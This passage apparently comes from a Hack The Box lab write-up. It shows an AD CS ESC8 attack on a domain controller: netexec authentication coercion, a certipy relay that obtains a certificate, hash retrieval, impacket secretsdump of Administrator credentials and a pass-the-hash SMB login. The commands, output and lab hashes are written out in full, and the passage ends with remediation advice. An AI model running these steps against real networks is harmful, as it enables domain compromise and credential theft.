COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 Exploit Success, netdfs\NetrDfsRemoveStdRoot
And we can see the connections to our certipy relay which appear to be finishing the exploit:
[*] SMBD-Thread-2 (process_request_thread): Received connection from 10.129.234.48, attacking target http://dc-jpq225.cicada.vl
[*] SMBD-Thread-3 (process_request_thread): Received connection from 10.129.234.48, attacking target http://dc-jpq225.cicada.vl
[*] SMBD-Thread-4 (process_request_thread): Received connection from 10.129.234.48, attacking target http://dc-jpq225.cicada.vl
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.129.234.48, attacking target http://dc-jpq225.cicada.vl
[*] SMBD-Thread-6 (process_request_thread): Received connection from 10.129.234.48, attacking target http://dc-jpq225.cicada.vl
[*] SMBD-Thread-7 (process_request_thread): Received connection from 10.129.234.48, attacking target http://dc-jpq225.cicada.vl
[*] SMBD-Thread-8 (process_request_thread): Received connection from 10.129.234.48, attacking target http://dc-jpq225.cicada.vl
[*] SMBD-Thread-9 (process_request_thread): Received connection from 10.129.234.48, attacking target http://dc-jpq225.cicada.vl
This takes a while, so it’s time to wait and see if we succeed. If we do, we should eventually get a .pfx file from certipy.
After waiting 5-10 minutes, there was no .pfx file, so I decided to move onto the next coercion method:
netexec smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k -M coerce_plus -o LISTENER=DC-JPQ225PIZZAMCCHICKEN METHOD=PetitPotam
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [*] x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:False) (NTLM:False)
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [+] cicada.vl\Rosie.Powell:Cicada123
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, PetitPotam
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 Exploit Success, lsarpc\EfsRpcAddUsersToFile
We get more connections on our certipy relay (I restarted it just in case):
certipy relay -target 'http://dc-jpq225.cicada.vl/' -template DomainController
Certipy v5.0.3 - by Oliver Lyak (ly4k)
import pkg_resources
[*] Targeting http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp (ESC8)
[*] Listening on 0.0.0.0:445
[*] Setting up SMB Server on port 445
[*] SMBD-Thread-2 (process_request_thread): Received connection from 10.129.234.48, attacking target http://dc-jpq225.cicada.vl
[*] SMBD-Thread-3 (process_request_thread): Received connection from 10.129.234.48, attacking target http://dc-jpq225.cicada.vl
My experience was that this vulnerability was VERY flaky to exploit and takes a long time, much longer than it seems like it should.
Eventually, after a number of tries using different coerce methods, I got this:
[-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 401 Unauthorized"
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 401 Unauthorized"
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 200 OK"
[*] Authenticating against http://dc-jpq225.cicada.vl as / SUCCEED
[*] Requesting certificate for '\\' based on the template 'DomainController'
[*] HTTP Request: POST http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 200 OK"
[*] Certificate issued with request ID 95
[*] Retrieving certificate for request ID: 95
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certnew.cer?ReqID=95 "HTTP/1.1 200 OK"
[*] Got certificate with DNS Host Name 'DC-JPQ225.cicada.vl'
[*] Certificate object SID is 'S-1-5-21-687703393-1447795882-66098247-1000'
[*] Saving certificate and private key to 'dc-jpq225.pfx'
[*] Wrote certificate and private key to 'dc-jpq225.pfx'
[*] Exiting...
Now that we have the certificate we can hopefully extract hashes for the computer user with certipy:
certipy auth -pfx dc-jpq225.pfx -dc-ip 10.129.234.48
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN DNS Host Name: 'DC-JPQ225.cicada.vl'
[*] Security Extension SID: 'S-1-5-21-687703393-1447795882-66098247-1000'
[*] Using principal: 'dc-jpq225$@cicada.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'dc-jpq225.ccache'
[*] Wrote credential cache to 'dc-jpq225.ccache'
[*] Trying to retrieve NT hash for 'dc-jpq225$'
[*] Got hash for 'dc-jpq225$@cicada.vl': aad3b435b51404eeaad3b435b51404ee:a65952c664e9cf5de60195626edbeee3
As a bonus we also get a Kerberos TGT. Let’s set up our environment to use that instead of Rosie’s:
KRB5CCNAME=dc-jpq225.ccache
Then, we can dump hashes from the machine with impacket:
impacket-secretsdump -k -no-pass cicada.vl/dc-jpq225\$@dc-jpq225.cicada.vl -just-dc-user administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:85a0da53871a9d56b6cd05deda3a5e87:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:f9181ec2240a0d172816f3b5a185b6e3e0ba773eae2c93a581d9415347153e1a
Administrator:aes128-cts-hmac-sha1-96:926e5da4d5cd0be6e1cea21769bb35a4
Administrator:des-cbc-md5:fd2a29621f3e7604
[*] Cleaning up...
Then, we can use this hash to get SMB access as Administrator to access all files on the machine:
impacket-smbclient -k -hashes 'aad3b435b51404eeaad3b435b51404ee:85a0da53871a9d56b6cd05deda3a5e87' cicada.vl/Administrator@DC-JPQ225.cicada.vl
/home/kali/.virtualenvs/htb/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
Type help for list of commands
#
We can then find both user.txt and root.txt on the Administrator’s desktop:
# ls
drw-rw-rw- 0 Fri Apr 11 02:00:38 2025 .
drw-rw-rw- 0 Fri Sep 13 12:10:12 2024 ..
-rw-rw-rw- 282 Fri Sep 13 06:21:49 2024 desktop.ini
-rw-rw-rw- 2304 Sun Sep 15 09:26:47 2024 Microsoft Edge.lnk
-rw-rw-rw- 34 Sat Jul 5 17:32:50 2025 root.txt
-rw-rw-rw- 34 Sat Jul 5 17:32:50 2025 user.txt
Closing the Vulnerability
- Don’t store passwords on sticky notes - even with the ESC8 vulnerability we wouldn’t have been able to exploit it without Rosie.Powell’s credentials.
- Make sure images you post don’t have sensitive info - even though Rosie put her password on a sticky note, we still would’ve needed physical access to her desk to exploit this, except that she or someone else posted shared a picture that had her password accidentally disclosed.
- Be careful what you put on NFS, since connecting gives users potentially access to everything in the share regardless of what the system level permissions are
- Watch out for ESC series vulnerability in active directory. The following must be present for an ESC8 vulnerability to exist:
- AD CS Web Enrollment enabled
- NTLM Auth is accepted over HTTP
- Certificate templates with auto-issue set
- Weak validation of certificate requests (i.e. a single person can do it)
- Attacker able to coerce NTLM auth from a privileged account
Key Penetration Testing Takeaways
- All ports matter; think about how services in various places might be chained together to get you what you need.
- Sometimes it is handy to have an environment besides just Linux around, even if it’s just a Windows VM.
- Sometimes you have to be willing to go the extra mile to get a complicated exploit to work.
- Exploits can be flaky.
- Investigate posted pictures from known employees to see if things may have been exposed inadvertently.